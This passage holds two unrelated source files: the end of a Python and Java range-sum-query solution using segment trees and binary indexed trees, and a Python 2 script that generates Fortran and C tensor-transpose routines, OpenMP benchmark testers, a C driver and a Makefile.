if root.start == i and root.end == i:
root.sum = val
return
updateHelper(root.left, i, val)
updateHelper(root.right, i, val)
# Update sum.
root.sum = (root.left.sum if root.left else 0) + \
(root.right.sum if root.right else 0)
if self.__nums[i] != val:
self.__nums[i] = val
updateHelper(self.__root, i, val)
def sumRange(self, i, j):
"""
sum of elements nums[i..j], inclusive.
:type i: int
:type j: int
:rtype: int
"""
def sumRangeHelper(root, start, end):
# Out of range.
if not root or root.start > end or root.end < start:
return 0
# Current segment is totally within range [start, end]
if root.start >= start and root.end <= end:
return root.sum
return sumRangeHelper(root.left, start, end) + \
sumRangeHelper(root.right, start, end)
return sumRangeHelper(self.__root, i, j)
class _SegmentTreeNode:
def __init__(self, i, j, s):
self.start, self.end, self.sum = i, j ,s
#
# Time: ctor: O(nlogn),
# update: O(logn),
# query: O(logn)
# Space: O(n)
# Binary Indexed Tree (BIT) solution.
#
# 112ms 26.40%
class NumArray2(object):
def __init__(self, nums):
"""
initialize your data structure here.
:type nums: List[int]
"""
# Build segment tree.
if not nums:
return
self.__nums = nums
self.__bit = [0] * (len(self.__nums) + 1)
for i, num in enumerate(self.__nums):
self.__add(i, num)
def update(self, i, val):
"""
:type i: int
:type val: int
:rtype: int
"""
if val - self.__nums[i]:
self.__add(i, val - self.__nums[i])
self.__nums[i] = val
def sumRange(self, i, j):
"""
sum of elements nums[i..j], inclusive.
:type i: int
:type j: int
:rtype: int
"""
def sumRegion_bit(i):
i += 1
ret = 0
while i > 0:
ret += self.__bit[i]
i -= (i & -i) # i & bitwise and -i = 1
return ret
ret = sumRegion_bit(j)
if i > 0:
ret -= sumRegion_bit(i - 1)
return ret
def __add(self, i , val):
i += 1
while i <= len(self.__nums):
self.__bit[i] += val
i += ( i & -i)
# Your NumArray object will be instantiated and called as such:
# numArray = NumArray(nums)
# numArray.sumRange(0, 1)
# numArray.update(1, 10)
# numArray.sumRange(1, 2)
class TestMethods(unittest.TestCase):
def test_Local(self):
self.assertEqual(1, 1)
if __name__ == '__main__':
unittest.main()
Java = '''
# Thought: https://leetcode.com/problems/range-sum-query-immutable/solution/
# 73.20% 213ms
class NumArray {
int[] sum;
public NumArray(int[] nums) {
int n = nums.length;
sum = new int[n+1];
sum[0] = 0;
for(int i=1;i<=n;i++){
sum[i] = sum[i-1]+nums[i-1];
}
}
public int sumRange(int i, int j) {
return sum[j+1]-sum[i];
}
}
# 115ms 98.39%
class NumArray {
int[] mSum;
public NumArray(int[] nums) {
for (int i = 1; i < nums.length; i++) {
nums[i] += nums[i - 1];
}
mSum = nums;
}
public int sumRange(int i, int j) {
if ( i ==0 ) return mSum[j];
return mSum[j] - mSum[i-1];
}
}
// Your NumArray object will be instantiated and called as such:
// NumArray numArray = new NumArray(nums);
// numArray.sumRange(0, 1);
// numArray.sumRange(1, 2);
# BIT
# 142ms 75.89%
class NumArray {
int[] mNums;
int[] mBit;
public NumArray(int[] nums) {
mNums = nums;
mBit = new int[nums.length + 1];
for (int i = 0; i < nums.length; i++) {
buildTree(i, nums[i]);
}
}
public int sumRange(int i, int j) {
return getSum(j) - getSum(i - 1);
}
private void buildTree(int i, int val) {
i++;
while (i <= mNums.length) {
mBit[i] += val;
i += (i & -i);
}
}
private int getSum(int i) {
i++;
int sum = 0;
while ( i > 0) {
sum += mBit[i];
i -= (i & -i);
}
return sum;
}
}
# Segment Tree:
# 201ms 38.86%
class NumArray {
Node mRoot = null;
public NumArray(int[] nums) {
mRoot = buildStree(nums, 0, nums.length - 1);
}
public int sumRange(int i, int j) {
return getSum(mRoot, i, j);
}
private Node buildStree(int[] nums, int start, int end) {
if (start > end) return null;
Node node = new Node(start, end);
if (start == end) node.mSum = nums[start];
else {
int mid = start + (end - start) / 2;
node.mLeft = buildStree(nums, start, mid);
node.mRight = buildStree(nums, mid + 1, end);
node.mSum = node.mLeft.mSum + node.mRight.mSum;
}
return node;
}
private int getSum(Node node, int i, int j) {
if (i == node.mStart && j == node.mEnd) return node.mSum;
else {
int mid = node.mStart + (node.mEnd - node.mStart) / 2;
if (j <= mid) { //tricky
return getSum(node.mLeft, i, j);
} else if (mid + 1 <= i) { //tricky
return getSum(node.mRight, i, j);
} else {
return getSum(node.mLeft, i, mid) + getSum(node.mRight, mid+1, j);
}
}
}
class Node{
int mStart, mEnd, mSum;
Node mLeft, mRight;
public Node(int start, int end){
mStart = start;
mEnd = end;
mSum = 0;
mLeft = mRight = null;
}
}
}
'''
| |
#!/usr/bin/python
import fileinput
import string
import sys
import os
import subprocess
def perm(l):
sz = len(l)
if sz <= 1:
return [l]
return [p[:i]+[l[0]]+p[i:] for i in xrange(sz) for p in perm(l[1:])]
def generate_permutation_list(Debug):
#indices = ['4','3','2','1']
indices = ['1','2','3','4']
if Debug:
permlist = [indices]
else:
permlist = perm(indices)
return permlist
def perm_to_string(perm):
A = perm[0]
B = perm[1]
C = perm[2]
D = perm[3]
return A+B+C+D
def get_omp_info(OpenMP):
if OpenMP:
name = 'omp'
text = 'with OpenMP'
else:
name = 'nomp'
text = 'without OpenMP'
return (name,text)
#
# NOTES
#
# collapse(4) is not good. on BGQ it is terrible, probably due to L1 thrashing.
def generate_cfunction(ofile, name, description, OpenMP, transpose_order, loop_order):
A = transpose_order[0]
B = transpose_order[1]
C = transpose_order[2]
D = transpose_order[3]
a = loop_order[0]
b = loop_order[1]
c = loop_order[2]
d = loop_order[3]
ofile.write(description)
ofile.write('void '+name+'(const double * restrict unsorted, double * restrict sorted, const int * const dim1, const int * const dim2, const int * const dim3, const int * const dim4, const double * const factor, const double * const acc_factor)\n')
ofile.write('{\n')
ofile.write(' const int d1 = *dim1;\n')
ofile.write(' const int d2 = *dim2;\n')
ofile.write(' const int d3 = *dim3;\n')
ofile.write(' const int d4 = *dim4;\n')
ofile.write(' const int f = *factor;\n')
ofile.write(' const int g = *acc_factor;\n')
ofile.write(' if (f==1.0 && g==0.0) {\n')
if OpenMP:
ofile.write('#ifdef _OPENMP \n')
ofile.write('#pragma omp parallel for collapse(2) firstprivate(d1,d2,d3,d4) shared(sorted,unsorted) schedule(static)\n')
ofile.write('#endif \n')
ofile.write(' for (int j'+a+' = 0; j'+a+'<d'+a+'; j'+a+'++) {\n')
ofile.write(' for (int j'+b+' = 0; j'+b+'<d'+b+'; j'+b+'++) {\n')
ofile.write(' for (int j'+c+' = 0; j'+c+'<d'+c+'; j'+c+'++) {\n')
ofile.write(' for (int j'+d+' = 0; j'+d+'<d'+d+'; j'+d+'++) {\n')
ofile.write(' sorted[j'+D+'+d'+D+'*(j'+C+'+d'+C+'*(j'+B+'+d'+B+'*(j'+A+')))] = unsorted[j4+d4*(j3+d3*(j2+d2*(j1)))];\n')
ofile.write(' }}}}\n\n')
ofile.write(' } else if (f!=1.0 && g==0.0) { \n\n')
if OpenMP:
ofile.write('#ifdef _OPENMP \n')
ofile.write('#pragma omp parallel for collapse(2) firstprivate(d1,d2,d3,d4,f) shared(sorted,unsorted) schedule(static)\n')
ofile.write('#endif \n')
ofile.write(' for (int j'+a+' = 0; j'+a+'<d'+a+'; j'+a+'++) {\n')
ofile.write(' for (int j'+b+' = 0; j'+b+'<d'+b+'; j'+b+'++) {\n')
ofile.write(' for (int j'+c+' = 0; j'+c+'<d'+c+'; j'+c+'++) {\n')
ofile.write(' for (int j'+d+' = 0; j'+d+'<d'+d+'; j'+d+'++) {\n')
ofile.write(' sorted[j'+D+'+d'+D+'*(j'+C+'+d'+C+'*(j'+B+'+d'+B+'*(j'+A+')))] = f*unsorted[j4+d4*(j3+d3*(j2+d2*(j1)))];\n')
ofile.write(' }}}}\n\n')
ofile.write(' } else if (f==1.0 && g==1.0) { \n\n')
if OpenMP:
ofile.write('#ifdef _OPENMP \n')
ofile.write('#pragma omp parallel for collapse(2) firstprivate(d1,d2,d3,d4,f) shared(sorted,unsorted) schedule(static)\n')
ofile.write('#endif \n')
ofile.write(' for (int j'+a+' = 0; j'+a+'<d'+a+'; j'+a+'++) {\n')
ofile.write(' for (int j'+b+' = 0; j'+b+'<d'+b+'; j'+b+'++) {\n')
ofile.write(' for (int j'+c+' = 0; j'+c+'<d'+c+'; j'+c+'++) {\n')
ofile.write(' for (int j'+d+' = 0; j'+d+'<d'+d+'; j'+d+'++) {\n')
ofile.write(' sorted[j'+D+'+d'+D+'*(j'+C+'+d'+C+'*(j'+B+'+d'+B+'*(j'+A+')))] += unsorted[j4+d4*(j3+d3*(j2+d2*(j1)))];\n')
ofile.write(' }}}}\n\n')
ofile.write(' } else if (f!=1.0 && g==1.0) { \n\n')
if OpenMP:
ofile.write('#ifdef _OPENMP \n')
ofile.write('#pragma omp parallel for collapse(2) firstprivate(d1,d2,d3,d4,f) shared(sorted,unsorted) schedule(static)\n')
ofile.write('#endif \n')
ofile.write(' for (int j'+a+' = 0; j'+a+'<d'+a+'; j'+a+'++) {\n')
ofile.write(' for (int j'+b+' = 0; j'+b+'<d'+b+'; j'+b+'++) {\n')
ofile.write(' for (int j'+c+' = 0; j'+c+'<d'+c+'; j'+c+'++) {\n')
ofile.write(' for (int j'+d+' = 0; j'+d+'<d'+d+'; j'+d+'++) {\n')
ofile.write(' sorted[j'+D+'+d'+D+'*(j'+C+'+d'+C+'*(j'+B+'+d'+B+'*(j'+A+')))] += f*unsorted[j4+d4*(j3+d3*(j2+d2*(j1)))];\n')
ofile.write(' }}}}\n\n')
ofile.write(' } else { \n\n')
if OpenMP:
ofile.write('#ifdef _OPENMP \n')
ofile.write('#pragma omp parallel for collapse(2) firstprivate(d1,d2,d3,d4,f,g) shared(sorted,unsorted) schedule(static)\n')
ofile.write('#endif \n')
ofile.write(' for (int j'+a+' = 0; j'+a+'<d'+a+'; j'+a+'++) {\n')
ofile.write(' for (int j'+b+' = 0; j'+b+'<d'+b+'; j'+b+'++) {\n')
ofile.write(' for (int j'+c+' = 0; j'+c+'<d'+c+'; j'+c+'++) {\n')
ofile.write(' for (int j'+d+' = 0; j'+d+'<d'+d+'; j'+d+'++) {\n')
ofile.write(' sorted[j'+D+'+d'+D+'*(j'+C+'+d'+C+'*(j'+B+'+d'+B+'*(j'+A+')))] = g*sorted[j'+D+'+d'+D+'*(j'+C+'+d'+C+'*(j'+B+'+d'+B+'*(j'+A+')))] + f*unsorted[j4+d4*(j3+d3*(j2+d2*(j1)))];\n')
ofile.write(' }}}}\n\n')
ofile.write(' }\n\n')
ofile.write(' return;\n')
ofile.write('}\n\n')
return
def generate_subroutine(ofile, name, description, OpenMP, transpose_order, loop_order):
A = transpose_order[0]
B = transpose_order[1]
C = transpose_order[2]
D = transpose_order[3]
a = loop_order[0]
b = loop_order[1]
c = loop_order[2]
d = loop_order[3]
ofile.write(description)
ofile.write(' subroutine '+name+'(unsorted,sorted,\n')
ofile.write(' & dim1,dim2,dim3,dim4,factor,acc_factor)\n')
ofile.write(' implicit none\n')
ofile.write(' integer dim1,dim2,dim3,dim4\n')
ofile.write(' integer j1,j2,j3,j4\n')
ofile.write(' double precision sorted(dim1*dim2*dim3*dim4)\n')
ofile.write(' double precision unsorted(dim1*dim2*dim3*dim4)\n')
ofile.write(' double precision factor\n')
ofile.write(' double precision acc_factor\n')
for case in [1,2,3,4,5]:
if case==1:
ofile.write(' if ((factor .eq. 1.0).and.(acc_factor .eq. 0.0)) then\n')
elif case==2:
ofile.write(' else if ((factor .ne. 1.0).and.(acc_factor .eq. 0.0)) then\n')
elif case==3:
ofile.write(' else if ((factor .eq. 1.0).and.(acc_factor .eq. 1.0)) then\n')
elif case==4:
ofile.write(' else if ((factor .ne. 1.0).and.(acc_factor .eq. 1.0)) then\n')
elif case==5:
ofile.write(' else \n')
if OpenMP:
#ofile.write('!$omp parallel do collapse(2)\n')
ofile.write('!$omp parallel do \n')
ofile.write('!$omp& private(j1,j2,j3,j4)\n')
if case==1 or case==3:
ofile.write('!$omp& firstprivate(dim1,dim2,dim3,dim4)\n')
elif case==2 or case==4:
ofile.write('!$omp& firstprivate(dim1,dim2,dim3,dim4,factor)\n')
elif case==5:
ofile.write('!$omp& firstprivate(dim1,dim2,dim3,dim4,factor,acc_factor)\n')
ofile.write('!$omp& shared(sorted,unsorted)\n')
ofile.write('!$omp& schedule(static)\n')
if case==5:
ofile.write(' do j'+a+' = 1,dim'+a+'\n')
ofile.write(' do j'+b+' = 1,dim'+b+'\n')
ofile.write(' do j'+c+' = 1,dim'+c+'\n')
ofile.write(' do j'+d+' = 1,dim'+d+'\n')
ofile.write(' sorted(j'+D+'+dim'+D+'*(j'+C+'-1+dim'+C+'*(j'+B+'-1+dim'+B+'*(j'+A+'-1)))) = \n')
ofile.write(' & sorted(j'+D+'+dim'+D+'*(j'+C+'-1+dim'+C+'*(j'+B+'-1+dim'+B+'*(j'+A+'-1)))) + \n')
ofile.write(' & unsorted(j4+dim4*(j3-1+dim3*(j2-1+dim2*(j1-1))))\n')
ofile.write(' enddo\n')
ofile.write(' enddo\n')
ofile.write(' enddo\n')
ofile.write(' enddo\n')
else:
if (not OpenMP and a=='1' and A=='1' and b=='2' and B=='2' and c=='3' and C=='3' and d=='4' and D=='4'):
ofile.write(' call f_memcpy(sorted(1),unsorted(1),dim'+d+'*dim'+c+'*dim'+b+'*dim'+a+')\n')
elif (b=='2' and B=='2' and c=='3' and C=='3' and d=='4' and D=='4'):
ofile.write(' do j'+a+' = 1,dim'+a+'\n')
ofile.write(' call f_memcpy(\n')
ofile.write(' 1 sorted(dim'+B+'*(j'+A+'-1)),\n')
ofile.write(' 2 unsorted(dim2*(j1-1)),\n')
ofile.write(' 3 dim'+d+'*dim'+c+'*dim'+b+')\n')
ofile.write(' enddo\n')
elif (c=='3' and C=='3' and d=='4' and D=='4'):
ofile.write(' do j'+a+' = 1,dim'+a+'\n')
ofile.write(' do j'+b+' = 1,dim'+b+'\n')
ofile.write(' call f_memcpy(\n')
ofile.write(' 1 sorted(dim'+C+'*(j'+B+'-1+dim'+B+'*(j'+A+'-1))),\n')
ofile.write(' 2 unsorted(dim3*(j2-1+dim2*(j1-1))),\n')
ofile.write(' 3 dim'+d+'*dim'+c+')\n')
ofile.write(' enddo\n')
ofile.write(' enddo\n')
elif (d=='4' and D=='4'):
ofile.write(' do j'+a+' = 1,dim'+a+'\n')
ofile.write(' do j'+b+' = 1,dim'+b+'\n')
ofile.write(' do j'+c+' = 1,dim'+c+'\n')
ofile.write(' call f_memcpy(\n')
ofile.write(' 1 sorted(dim'+D+'*(j'+C+'-1+dim'+C+'*(j'+B+'-1+dim'+B+'*(j'+A+'-1)))),\n')
ofile.write(' 2 unsorted(dim4*(j3-1+dim3*(j2-1+dim2*(j1-1)))),\n')
ofile.write(' 3 dim'+d+')\n')
ofile.write(' enddo\n')
ofile.write(' enddo\n')
ofile.write(' enddo\n')
else:
ofile.write(' do j'+a+' = 1,dim'+a+'\n')
ofile.write(' do j'+b+' = 1,dim'+b+'\n')
ofile.write(' do j'+c+' = 1,dim'+c+'\n')
ofile.write(' do j'+d+' = 1,dim'+d+'\n')
if case==1:
ofile.write(' sorted(j'+D+'+dim'+D+'*(j'+C+'-1+dim'+C+'*(j'+B+'-1+dim'+B+'*(j'+A+'-1)))) = \n')
ofile.write(' & unsorted(j4+dim4*(j3-1+dim3*(j2-1+dim2*(j1-1))))\n')
elif case==2:
ofile.write(' sorted(j'+D+'+dim'+D+'*(j'+C+'-1+dim'+C+'*(j'+B+'-1+dim'+B+'*(j'+A+'-1)))) = \n')
ofile.write(' & factor*unsorted(j4+dim4*(j3-1+dim3*(j2-1+dim2*(j1-1))))\n')
elif case==3:
ofile.write(' sorted(j'+D+'+dim'+D+'*(j'+C+'-1+dim'+C+'*(j'+B+'-1+dim'+B+'*(j'+A+'-1)))) += \n')
ofile.write(' & unsorted(j4+dim4*(j3-1+dim3*(j2-1+dim2*(j1-1))))\n')
elif case==4:
ofile.write(' sorted(j'+D+'+dim'+D+'*(j'+C+'-1+dim'+C+'*(j'+B+'-1+dim'+B+'*(j'+A+'-1)))) += \n')
ofile.write(' & factor*unsorted(j4+dim4*(j3-1+dim3*(j2-1+dim2*(j1-1))))\n')
ofile.write(' enddo\n')
ofile.write(' enddo\n')
ofile.write(' enddo\n')
ofile.write(' enddo\n')
if OpenMP:
ofile.write('!$omp end parallel do\n')
ofile.write(' endif\n')
ofile.write(' return\n')
ofile.write(' end\n\n')
return
def generate_tester(ofile, transpose_order, reps, Language):
A = transpose_order[0]
B = transpose_order[1]
C = transpose_order[2]
D = transpose_order[3]
test_name = 'trans_'+perm_to_string(transpose_order)+'_'+Language
ofile.write(' subroutine test_'+test_name+'(reference, unsorted, sorted,\n')
ofile.write(' & dim1, dim2, dim3, dim4)\n')
ofile.write(' implicit none\n')
ofile.write('! external variables\n')
ofile.write(' integer dim1, dim2, dim3, dim4\n')
ofile.write(' double precision sorted(dim1*dim2*dim3*dim4)\n')
ofile.write(' double precision unsorted(dim1*dim2*dim3*dim4)\n')
ofile.write(' double precision reference(dim1*dim2*dim3*dim4)\n')
ofile.write('! internal variables\n')
ofile.write(' integer errors\n')
ofile.write(' integer loop, omp, fac, r\n')
ofile.write(' integer loops(4,24) \n')
ofile.write(' integer bestloop(4,5,2) ! best loop order for (fac,omp) \n')
ofile.write(' double precision factor, acc_factor\n')
ofile.write(' double precision t0, t1 \n')
ofile.write(' double precision dt0 ! reference timing for old_sort \n')
ofile.write(' double precision dt1 ! reference timing for old_sortacc \n')
ofile.write(' double precision dtX ! reference timing for comparison \n')
ofile.write(' double precision dt(24,5,2) ! time for (loop,fac,omp) \n')
ofile.write(' double precision besttime(5,2) ! best time for (fac,omp) \n')
ofile.write(' double precision wtime\n')
ofile.write(' external wtime\n')
ofile.write(' character*20 labels(2,5)\n')
ofile.write(' do omp = 1, 2\n')
ofile.write(' do fac = 1, 5\n')
ofile.write(' labels(omp,fac) = \'UNDEFINED\' \n')
ofile.write(' do loop = 1, 24\n')
ofile.write(' dt(loop,fac,omp) = 1000000.0\n')
ofile.write(' enddo\n')
ofile.write(' enddo\n')
ofile.write(' enddo\n')
ofile.write(' call init_4d_array(dim1,dim2,dim3,dim4,unsorted)\n')
for (Factor,Accumulate) in [(1.0,0.0),(37.0,0.0),(1.0,1.0),(37.0,1.0),(37.0,37.0)]:
if (Accumulate==0.0):
if Factor==1.0:
fac = 1
else:
fac = 2
elif (Accumulate==1.0):
if Factor==1.0:
fac = 3
else:
fac = 4
else:
fac = 5
if (Accumulate==0.0):
old_name = 'old_sort_4'
else:
old_name = 'old_sortacc_4'
# flush cache routine belongs here if we want to do that
ofile.write(' call zero_1d_array(dim1*dim2*dim3*dim4,reference)\n')
ofile.write(' t0 = wtime() \n')
ofile.write(' factor = '+str(Factor)+'\n')
ofile.write(' do r = 1,'+str(reps)+'\n')
ofile.write(' call '+old_name+'(unsorted,reference,\n')
ofile.write(' & dim1,dim2,dim3,dim4,\n')
ofile.write(' & '+str(A)+','+str(B)+','+str(C)+','+str(D)+',factor)\n')
ofile.write(' enddo\n')
ofile.write(' t1 = wtime() \n')
if (Accumulate==0.0):
ofile.write(' dt0 = (t1-t0) \n')
else:
ofile.write(' dt1 = (t1-t0) \n')
for OpenMP in [False,True]:
(omp_name,omp_text) = get_omp_info(OpenMP)
if OpenMP:
omp = 2
else:
omp = 1
loop = 0
for loop_order in generate_permutation_list(Debug):
loop = loop+1
a = loop_order[0]
b = loop_order[1]
c = loop_order[2]
d = loop_order[3]
source_name = 'trans_'+perm_to_string(transpose_order)+'_loop_'+perm_to_string(loop_order)
variant = omp_name+'_'+Language
subroutine_name = source_name+'_'+variant
ofile.write(' labels('+str(omp)+','+str(fac)+') = \''+variant+'('+str(Factor)+','+str(Accumulate)+')\' \n')
ofile.write('!******** '+str(a)+','+str(b)+','+str(c)+','+str(d)+' ********\n')
ofile.write(' fac = '+str(fac)+' \n')
ofile.write(' omp = '+str(omp)+' \n')
ofile.write(' loop = '+str(loop)+' \n')
ofile.write(' loops(1,loop) = '+str(a)+'\n')
ofile.write(' loops(2,loop) = '+str(b)+'\n')
ofile.write(' loops(3,loop) = '+str(c)+'\n')
ofile.write(' loops(4,loop) = '+str(d)+'\n')
ofile.write(' call zero_1d_array(dim1*dim2*dim3*dim4,sorted)\n')
# flush cache routine belongs here if we want to do that
ofile.write(' factor = '+str(Factor)+'\n')
ofile.write(' acc_factor = '+str(Accumulate)+'\n')
ofile.write(' t0 = wtime() \n')
ofile.write(' do r = 1,'+str(reps)+'\n')
ofile.write(' call '+subroutine_name+'(unsorted,sorted,\n')
ofile.write(' & dim1,dim2,dim3,dim4,factor,acc_factor)\n')
ofile.write(' enddo\n')
ofile.write(' t1 = wtime() \n')
ofile.write(' if (acc_factor .eq. 0.0) then\n')
ofile.write(' call compare_1d_array(dim1*dim2*dim3*dim4,\n')
ofile.write(' & sorted,reference,errors) \n')
ofile.write(' else\n')
ofile.write(' errors = 0\n')
ofile.write(' endif\n')
ofile.write(' if (errors.eq.0) then\n')
ofile.write(' dt(loop,fac,omp) = (t1-t0)\n')
ofile.write(' else\n')
ofile.write(' dt(loop,fac,omp) = 10000000.0\n')
ofile.write(' print*,\''+subroutine_name+'\'\n')
ofile.write(' print*,\'errors = \',errors \n')
ofile.write(' call print_4d_arrays(dim1,dim2,dim3,dim4,\n')
ofile.write(' & sorted,reference) \n')
ofile.write(' endif\n')
ofile.write('!*************************************************\n')
ofile.write('! determine the best time and loop order for each of (fac,omp)\n')
ofile.write(' write(6,2000) '+str(A)+','+str(B)+','+str(C)+','+str(D)+'\n')
ofile.write(' write(6,1500) \'old_sort_4 \',dt0,(8*dim1*dim2*dim3*dim4)/dt0\n')
ofile.write(' write(6,1500) \'old_sortacc_4\',dt1,(8*dim1*dim2*dim3*dim4)/dt1\n')
ofile.write(' do omp = 1, 2\n')
ofile.write(' do fac = 1, 5\n')
ofile.write(' ! make sure these are right for the fac cases at hand \n')
ofile.write(' if (fac.le.2) dtX = dt0 \n')
ofile.write(' if (fac.gt.2) dtX = dt1 \n')
ofile.write(' besttime(fac,omp) = 1000000.0\n')
ofile.write(' do loop = 1, 24\n')
ofile.write(' if (dt(loop,fac,omp).lt.besttime(fac,omp)) then\n')
ofile.write(' besttime(fac,omp) = dt(loop,fac,omp)\n')
ofile.write(' bestloop(1,fac,omp) = loops(1,loop)\n')
ofile.write(' bestloop(2,fac,omp) = loops(2,loop)\n')
ofile.write(' bestloop(3,fac,omp) = loops(3,loop)\n')
ofile.write(' bestloop(4,fac,omp) = loops(4,loop)\n')
ofile.write(' endif\n')
ofile.write(' enddo\n')
ofile.write(' if (besttime(fac,omp).lt.1000000.0) then\n')
ofile.write(' write(6,1000) \'best \',labels(omp,fac),\n')
ofile.write(' & bestloop(1,fac,omp),bestloop(2,fac,omp),\n')
ofile.write(' & bestloop(3,fac,omp),bestloop(4,fac,omp),\n')
ofile.write(' & besttime(fac,omp),dtX/besttime(fac,omp),\n')
ofile.write(' & (8*dim1*dim2*dim3*dim4)/besttime(fac,omp)\n')
ofile.write(' endif\n')
ofile.write(' enddo\n')
ofile.write(' enddo\n')
ofile.write(' return\n')
ofile.write(' 1000 format(1x,a8,a22,\' = \',4i1,1x,f9.6,1x,\'(\',f7.3,\'x,\',e10.3,\' B/s)\')\n')
ofile.write(' 1500 format(11x,a13,7x,\' = \',5x,f9.6,1x,\'(\',9x,e10.3,\' B/s)\')\n')
ofile.write(' 2000 format(1x,\'transpose: \',4i1)\n')
ofile.write(' end\n')
return
def generate_test_driver(Debug, Compiler, subdir, underscoring, rev, flags):
oname = 'test_trans_all'
cfile = open(subdir+'/'+oname+'.c','w')
hfile = open(subdir+'/'+oname+'.h','w')
cfile.write('#include <stdio.h>\n')
cfile.write('#include <stdlib.h>\n')
cfile.write('#include <string.h>\n')
cfile.write('#include <assert.h>\n\n')
cfile.write('int posix_memalign(void **memptr, size_t alignment, size_t size); \n\n')
cfile.write('#ifdef _OPENMP\n')
cfile.write('#include <omp.h>\n')
cfile.write('#endif\n\n')
cfile.write('#ifdef USE_MPI\n')
cfile.write('#include <mpi.h>\n')
cfile.write('#endif\n\n')
cfile.write('#include \"'+oname+'.h\"\n\n')
cfile.write('int main(int argc, char * argv[])\n')
cfile.write('{\n')
cfile.write(' int rc;\n')
cfile.write(' int dim1 = (argc>1) ? atoi(argv[1]) : 30;\n')
cfile.write(' int dim2 = (argc>2) ? atoi(argv[2]) : 30;\n')
cfile.write(' int dim3 = (argc>3) ? atoi(argv[3]) : 30;\n')
cfile.write(' int dim4 = (argc>4) ? atoi(argv[4]) : 30;\n')
cfile.write(' int size = dim1*dim2*dim3*dim4;\n\n')
cfile.write('#ifdef _OPENMP\n')
cfile.write(' int nthreads = omp_get_max_threads();\n')
cfile.write('#else\n')
cfile.write(' int nthreads = 1;\n')
cfile.write('#endif\n\n')
cfile.write(' printf(\"SPAGHETTY: generator2.py r'+str(rev)+'\\n\");\n')
cfile.write(' printf(\"dims = %d,%d,%d,%d - OpenMP threads = %d \\n\", dim1, dim2, dim3, dim4, nthreads);\n')
cfile.write(' printf(\"%s compiler: %s \\n\", \"'+Compiler+'\",\"'+flags+'\");\n\n')
cfile.write(' fflush(stdout);\n')
cfile.write(' double * unsorted = NULL;\n')
cfile.write(' double * sorted = NULL;\n')
cfile.write(' double * reference = NULL;\n\n')
cfile.write(' rc = posix_memalign((void**)&unsorted, 128, size*sizeof(double)); assert(rc==0 && unsorted!=NULL);\n')
cfile.write(' rc = posix_memalign((void**)&sorted, 128, size*sizeof(double)); assert(rc==0 && sorted!=NULL);\n')
cfile.write(' rc = posix_memalign((void**)&reference, 128, size*sizeof(double)); assert(rc==0 && reference!=NULL);\n\n')
cfile.write(' /*********** begin testing **********/\n\n')
for Language in ['f','c']:
for transpose_order in generate_permutation_list(Debug):
A = transpose_order[0]
B = transpose_order[1]
C = transpose_order[2]
D = transpose_order[3]
test_name = 'trans_'+perm_to_string(transpose_order)+'_'+Language+underscoring
cfile.write(' test_'+test_name+'(reference, unsorted, sorted, &dim1, &dim2, &dim3, &dim4);\n')
hfile.write('void test_'+test_name+'(double * unsorted, double * sorted, double * reference,\n')
hfile.write(' int * dim1, int * dim2, int * dim3, int * dim4);\n')
cfile.write(' /* end testing */\n')
cfile.write(' free(reference);\n')
cfile.write(' free(sorted);\n')
cfile.write(' free(unsorted);\n\n')
cfile.write(' return 0;\n')
cfile.write('}\n\n')
cfile.close()
hfile.close()
def generate_all_subroutines(Debug, Compiler, subdir, underscoring):
if (Debug):
reps = 5
else:
reps = 15
for transpose_order in generate_permutation_list(Debug):
for Language in ['f','c']:
source_name = 'test_trans_'+perm_to_string(transpose_order)+'_'+Language
source_file = open(subdir+'/'+source_name+'.F','w')
generate_tester(source_file, transpose_order, reps, Language)
source_file.close()
for loop_order in generate_permutation_list(Debug):
source_name = 'trans_'+perm_to_string(transpose_order)+'_loop_'+perm_to_string(loop_order)+'_'+Language
source_file = open(subdir+'/'+source_name+'.'+Language,'w')
source_name = 'trans_'+perm_to_string(transpose_order)+'_loop_'+perm_to_string(loop_order)
for OpenMP in [False,True]:
(omp_name,omp_text) = get_omp_info(OpenMP)
variant = omp_name+'_'+Language
print 'generating '+source_name+'_'+variant
if (Language=='f'):
subroutine_name = source_name+'_'+variant
description = '! '+omp_text+'\n'
generate_subroutine(source_file, subroutine_name, description, OpenMP, transpose_order, loop_order)
if (Language=='c'):
cfunction_name = source_name+'_'+variant+underscoring
description = '/* '+omp_text+' */\n'
generate_cfunction(source_file, cfunction_name, description, OpenMP, transpose_order, loop_order)
source_file.close()
def generate_makefile(Debug, subdir, Compiler, rev):
makefile = open(subdir+'/Makefile','w')
if (Compiler=='GNU' or Compiler=='BGP-GNU' or Compiler=='BGQ-GNU' or Compiler=='Mac'):
if (Compiler=='GNU'):
makefile.write('CC = gcc \n')
makefile.write('FC = gfortran \n')
if (Compiler=='BGP-GNU'):
print 'You need to use the GCC 4.3.2 version not the default...'
makefile.write('CC = powerpc-bgp-linux-gcc \n')
makefile.write('FC = powerpc-bgp-linux-gfortran \n')
if (Compiler=='BGQ-GNU'):
makefile.write('CC = powerpc64-bgq-linux-gcc \n')
makefile.write('FC = powerpc64-bgq-linux-gfortran \n')
makefile.write('LD = $(FC) \n')
makefile.write('OMPFLAGS = -fopenmp \n')
makefile.write('CFLAGS = -std=c99 $(OMPFLAGS) \n')
makefile.write('FFLAGS = -fno-underscoring $(OMPFLAGS) \n')
if (Debug):
makefile.write('RFLAGS = -g -O0 -Wall \n')
makefile.write('OFLAGS = -g -O0 -Wall \n')
else:
makefile.write('RFLAGS = -O1 \n')
makefile.write('OFLAGS = -Os \n')
flags = '-fopenmp -std=c99 -fno-underscoring -O3'
makefile.write('LDFLAGS = $(FFLAGS) $(RFLAGS) \n')
makefile.write('SFLAGS = -fverbose-asm \n\n')
elif (Compiler=='LLVM' or Compiler=='BGQ-LLVM'):
if (Compiler=='LLVM'):
makefile.write('CC = clang \n')
makefile.write('FC = gfortran \n')
if (Compiler=='BGQ-LLVM'):
makefile.write('CC = bgclang \n')
makefile.write('FC = powerpc64-bgq-linux-gfortran \n')
makefile.write('LD = $(FC) \n')
makefile.write('OMPFLAGS = -fopenmp \n')
makefile.write('CFLAGS = -std=c99 $(OMPFLAGS) \n')
makefile.write('FFLAGS = -fno-underscoring $(OMPFLAGS) \n')
if (Debug):
makefile.write('RFLAGS = -g -O0 -Wall \n')
makefile.write('OFLAGS = -g -O0 -Wall \n')
else:
makefile.write('RFLAGS = -O2 \n')
makefile.write('OFLAGS = -O3 \n')
flags = '-fopenmp -std=c99 -fno-underscoring -O3'
makefile.write('LDFLAGS = $(FFLAGS) $(RFLAGS) \n')
makefile.write('SFLAGS = -fverbose-asm \n\n')
elif (Compiler=='Intel'):
makefile.write('CC = icc \n')
makefile.write('FC = ifort \n')
